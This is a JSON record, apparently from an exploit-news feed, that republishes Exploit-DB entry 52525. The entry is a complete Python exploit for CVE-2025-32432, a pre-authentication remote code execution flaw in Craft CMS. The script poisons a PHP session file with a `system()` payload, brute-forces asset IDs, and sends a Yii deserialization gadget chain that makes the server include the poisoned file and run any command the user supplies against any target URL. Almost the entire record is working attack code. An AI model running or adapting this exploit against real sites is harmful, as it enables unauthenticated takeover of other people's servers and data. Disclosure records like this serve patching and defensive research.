{“lastseen”:”2026-04-29T11:27:57″,”description”:”Exploit Title: Craft CMS 5.6.16 – RCE Google Dork: N\/A Date: 2026-01-24 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Vendor Homepage: https:\/\/craftcms.com Software Link: https:\/\/github.com\/craftcms\/cms Version: = 3.9.14, = 4.14.14, =…”,”published”:”2026-04-29T00:00:00″,”modified”:”2026-04-29T00:00:00″,”type”:”exploitdb”,”title”:”Craft CMS 5.6.16 – RCE”,”source”:””,”references”:””,”id”:”EDB-ID:52525″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-32432″],”sourceData”:”# Exploit Title: Craft CMS 5.6.16 – RCE\\r\\n# Google Dork: N\/A\\r\\n# Date: 2026-01-24\\r\\n# Exploit Author: Mohammed Idrees Banyamer\\r\\n# Author Country: Jordan\\r\\n# Vendor Homepage: https:\/\/craftcms.com\\r\\n# Software Link: https:\/\/github.com\/craftcms\/cms\\r\\n# Version: \\u003c= 3.9.14, \\u003c= 4.14.14, \\u003c= 5.6.16\\r\\n# Tested on: Linux, Apache\/Nginx, PHP 8.x\\r\\n# CVE: CVE-2025-32432\\r\\n#\\r\\n# Description:\\r\\n# Craft CMS contains a pre-authentication remote code execution vulnerability\\r\\n# in the assets\/generate-transform endpoint. By abusing a Yii deserialization\\r\\n# gadget chain (FieldLayoutBehavior \u2192 PhpManager) and poisoning a PHP session\\r\\n# file, an unauthenticated attacker can achieve arbitrary command execution.\\r\\n#\\r\\n\\r\\nimport requests\\r\\nimport argparse\\r\\nimport time\\r\\nimport urllib3\\r\\n\\r\\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\\r\\n\\r\\n\\r\\ndef find_asset_id(base_url, max_attempts=300):\\r\\n \\”\\”\\”\\r\\n Brute-force search for a valid Asset ID.\\r\\n This is optional and may be unreliable on some installations.\\r\\n \\”\\”\\”\\r\\n session = requests.Session()\\r\\n session.verify = False\\r\\n\\r\\n print(\\”[*] Brute-forcing Asset ID (best-effort)…\\”)\\r\\n\\r\\n for asset_id in range(1, max_attempts + 1):\\r\\n url = f\\”{base_url}\/actions\/assets\/generate-transform\\”\\r\\n payload = {\\r\\n \\”assetId\\”: asset_id,\\r\\n \\”handle\\”: {\\r\\n \\”width\\”: 1,\\r\\n \\”height\\”: 1,\\r\\n \\”as hack\\”: {\\r\\n \\”class\\”: \\”craft\\\\\\\\behaviors\\\\\\\\FieldLayoutBehavior\\”,\\r\\n \\”__class\\”: \\”yii\\\\\\\\rbac\\\\\\\\PhpManager\\”,\\r\\n \\”__construct()\\”: [\\r\\n {\\r\\n \\”itemFile\\”: \\”invalid\\”\\r\\n }\\r\\n ]\\r\\n }\\r\\n }\\r\\n }\\r\\n\\r\\n try:\\r\\n r = session.post(url, json=payload, timeout=5)\\r\\n if r.status_code != 404:\\r\\n print(f\\”[+] Potential valid Asset ID found: {asset_id} (HTTP {r.status_code})\\”)\\r\\n return asset_id\\r\\n except:\\r\\n continue\\r\\n\\r\\n print(f\\”[-] No valid Asset ID found after {max_attempts} attempts.\\”)\\r\\n return None\\r\\n\\r\\n\\r\\ndef implant_php(base_url, cmd):\\r\\n \\”\\”\\”\\r\\n Step 1: Poison the PHP session file with injected PHP code.\\r\\n This relies on old-style behavior where query parameters are written\\r\\n into the session file without sanitization.\\r\\n \\”\\”\\”\\r\\n\\r\\n injection = f\\”\\u003c?php system(‘{cmd}’); ?\\u003e\\”\\r\\n url = f\\”{base_url}\/index.php?p=admin\/dashboard\\u0026a={injection}\\”\\r\\n\\r\\n try:\\r\\n r = requests.get(url, verify=False, timeout=10)\\r\\n if r.status_code == 200:\\r\\n print(f\\”[+] Session poisoning request sent successfully\\”)\\r\\n return True\\r\\n else:\\r\\n print(f\\”[-] Injection failed (HTTP {r.status_code})\\”)\\r\\n return False\\r\\n except Exception as e:\\r\\n print(f\\”[-] Injection error: {e}\\”)\\r\\n return False\\r\\n\\r\\n\\r\\ndef execute_command(base_url, asset_id, session_id):\\r\\n \\”\\”\\”\\r\\n Step 2: Trigger deserialization and force PhpManager to include\\r\\n the poisoned session file from \/tmp\/sess_\\u003cPHPSESSID\\u003e.\\r\\n \\”\\”\\”\\r\\n\\r\\n url = f\\”{base_url}\/actions\/assets\/generate-transform\\”\\r\\n\\r\\n payload = {\\r\\n \\”assetId\\”: asset_id,\\r\\n \\”handle\\”: {\\r\\n \\”width\\”: 1,\\r\\n \\”height\\”: 1,\\r\\n \\”as hack\\”: {\\r\\n \\”class\\”: \\”craft\\\\\\\\behaviors\\\\\\\\FieldLayoutBehavior\\”,\\r\\n \\”__class\\”: \\”yii\\\\\\\\rbac\\\\\\\\PhpManager\\”,\\r\\n \\”__construct()\\”: [\\r\\n {\\r\\n \\”itemFile\\”: f\\”\/tmp\/sess_{session_id}\\”\\r\\n }\\r\\n ]\\r\\n }\\r\\n }\\r\\n }\\r\\n\\r\\n try:\\r\\n r = requests.post(url, json=payload, verify=False, timeout=15)\\r\\n return r.text\\r\\n except Exception as e:\\r\\n return f\\”[-] Execution request failed: {e}\\”\\r\\n\\r\\n\\r\\ndef main():\\r\\n parser = argparse.ArgumentParser(\\r\\n description=\\”CVE-2025-32432 – Craft CMS Pre-Auth Remote Code Execution\\”\\r\\n )\\r\\n parser.add_argument(\\”-u\\”, \\”–url\\”, required=True,\\r\\n help=\\”Target base URL (e.g. https:\/\/victim.com)\\”)\\r\\n parser.add_argument(\\”-c\\”, \\”–cmd\\”, required=True,\\r\\n help=\\”Command to execute (e.g. id, whoami)\\”)\\r\\n parser.add_argument(\\”-a\\”, \\”–asset\\”, type=int,\\r\\n help=\\”Known valid Asset ID (recommended)\\”)\\r\\n parser.add_argument(\\”-s\\”, \\”–scan-max\\”, type=int, default=300,\\r\\n help=\\”Max Asset ID brute-force range (optional)\\”)\\r\\n\\r\\n args = parser.parse_args()\\r\\n\\r\\n base_url = args.url.rstrip(‘\/’)\\r\\n session = requests.Session()\\r\\n session.verify = False\\r\\n\\r\\n # Step 0: Obtain PHP session ID\\r\\n try:\\r\\n r = session.get(f\\”{base_url}\/index.php\\”, verify=False, timeout=10)\\r\\n session_id = session.cookies.get(\\”PHPSESSID\\”, None)\\r\\n\\r\\n if not session_id:\\r\\n print(\\”[-] Failed to obtain PHPSESSID\\”)\\r\\n return\\r\\n\\r\\n print(f\\”[+] Obtained PHPSESSID: {session_id}\\”)\\r\\n\\r\\n except Exception as e:\\r\\n print(f\\”[-] Failed to establish session: {e}\\”)\\r\\n return\\r\\n\\r\\n # Determine Asset ID\\r\\n asset_id = args.asset\\r\\n if not asset_id:\\r\\n asset_id = find_asset_id(base_url, args.scan_max)\\r\\n if not asset_id:\\r\\n print(\\”[-] Exploitation aborted: no valid Asset ID found\\”)\\r\\n return\\r\\n\\r\\n print(f\\”[+] Using Asset ID: {asset_id}\\”)\\r\\n\\r\\n # Step 1: Poison session file\\r\\n if not implant_php(base_url, args.cmd):\\r\\n print(\\”[-] Session poisoning failed\\”)\\r\\n return\\r\\n\\r\\n print(\\”[*] Waiting for session file to be written…\\”)\\r\\n time.sleep(2)\\r\\n\\r\\n # Step 2: Trigger RCE\\r\\n print(f\\”[*] Triggering command execution: {args.cmd}\\”)\\r\\n output = execute_command(base_url, asset_id, session_id)\\r\\n\\r\\n # Output handling\\r\\n print(\\”\\\\n[+] Server response:\\”)\\r\\n print(output[:2000])\\r\\n\\r\\n\\r\\nif __name__ == \\”__main__\\”:\\r\\n print(\\”=== CVE-2025-32432 – Craft CMS Pre-Auth RCE Exploit ===\\”)\\r\\n main()”,”sourceHref”:”https:\/\/www.exploit-db.com\/raw\/52525″,”cvss”:{“score”:10,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.exploit-db.com\/exploits\/52525″,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-29T11:27:57″,”description”:”Exploit Title: Craft CMS 5.6.16 – RCE Google Dork: N\/A Date: 2026-01-24 Exploit Author: Mohammed Idrees Banyamer Author Country: Jordan Vendor Homepage: https:\/\/craftcms.com Software Link:…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,36,12,40,13,7,11,5],"class_list":["post-50115","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-100","tag-exploit","tag-exploitdb","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n